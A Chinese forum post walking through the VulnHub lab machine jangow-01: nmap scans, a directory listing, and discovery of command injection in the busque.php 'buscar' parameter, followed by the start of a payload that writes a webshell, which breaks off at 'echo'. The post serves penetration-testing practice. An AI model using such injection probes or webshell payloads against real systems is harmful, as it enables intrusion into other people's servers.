vuluhub_jangow-01-1.0.1

打印 上一主题 下一主题

主题 723|帖子 723|积分 2169

前言

靶机:jangow-01-1.0.1
攻击机:kali linux2022.4
靶机描述

打靶ing

靶机探测

使用nmap扫描网段
点击查看代码
  1. ┌──(root㉿kali)-[/home/kali]
  2. └─# nmap 192.168.70.0/24      
  3. Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-13 20:56 EST
  4. Nmap scan report for 192.168.70.1
  5. Host is up (0.00012s latency).
  6. All 1000 scanned ports on 192.168.70.1 are in ignored states.
  7. Not shown: 1000 filtered tcp ports (no-response)
  8. MAC Address: 00:50:56:C0:00:08 (VMware)
  9. Nmap scan report for 192.168.70.2
  10. Host is up (0.000056s latency).
  11. Not shown: 999 closed tcp ports (reset)
  12. PORT   STATE SERVICE
  13. 53/tcp open  domain
  14. MAC Address: 00:50:56:FE:42:C8 (VMware)
  15. Nmap scan report for 192.168.70.152
  16. Host is up (0.00027s latency).
  17. Not shown: 998 filtered tcp ports (no-response)
  18. PORT   STATE SERVICE
  19. 21/tcp open  ftp
  20. 80/tcp open  http
  21. MAC Address: 00:0C:29:67:A6:61 (VMware)
  22. Nmap scan report for 192.168.70.254
  23. Host is up (0.00022s latency).
  24. All 1000 scanned ports on 192.168.70.254 are in ignored states.
  25. Not shown: 1000 filtered tcp ports (no-response)
  26. MAC Address: 00:50:56:EA:9C:6A (VMware)
  27. Nmap scan report for 192.168.70.137
  28. Host is up (0.0000070s latency).
  29. All 1000 scanned ports on 192.168.70.137 are in ignored states.
  30. Not shown: 1000 closed tcp ports (reset)
  31. Nmap done: 256 IP addresses (5 hosts up) scanned in 11.44 seconds
复制代码
发现靶机ip:192.168.70.152扫描开放端口信息

点击查看代码
  1. ┌──(root㉿kali)-[/home/kali]
  2. └─# nmap -A -p- 192.168.70.152
  3. Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-13 20:59 EST
  4. Nmap scan report for 192.168.70.152
  5. Host is up (0.00042s latency).
  6. Not shown: 65533 filtered tcp ports (no-response)
  7. PORT   STATE SERVICE VERSION
  8. 21/tcp open  ftp     vsftpd 3.0.3
  9. 80/tcp open  http    Apache httpd 2.4.18
  10. |_http-title: Index of /
  11. |_http-server-header: Apache/2.4.18 (Ubuntu)
  12. | http-ls: Volume /
  13. | SIZE  TIME              FILENAME
  14. | -     2021-06-10 18:05  site/
  15. |_
  16. MAC Address: 00:0C:29:67:A6:61 (VMware)
  17. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
  18. Device type: general purpose
  19. Running: Linux 3.X|4.X
  20. OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
  21. OS details: Linux 3.10 - 4.11, Linux 3.16 - 4.6, Linux 3.2 - 4.9, Linux 4.4
  22. Network Distance: 1 hop
  23. Service Info: Host: 127.0.0.1; OS: Unix
  24. TRACEROUTE
  25. HOP RTT     ADDRESS
  26. 1   0.42 ms 192.168.70.152
  27. OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  28. Nmap done: 1 IP address (1 host up) scanned in 118.11 seconds
复制代码
查看网站信息

先访问80端口

可以发现是一个目录遍历,查找一下有用信息
在site目录下发现一个网站


漏洞探测

四处看看功能点

发现了一个可以传参得接口
http://192.168.70.152/site/busque.php?buscar=
对变量buscar进行测试
传入参数1

没什么回显,传入id

在该参数发现存在rce
漏洞利用


利用该漏洞写入webshell
payload
192.168.70.152/site/busque.php?buscar=echo '

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?立即注册

x
回复

使用道具 举报

0 个回复

倒序浏览

快速回复

您需要登录后才可以回帖 登录 or 立即注册

本版积分规则

魏晓东

金牌会员
这个人很懒什么都没写!

标签云

快速回复 返回顶部 返回列表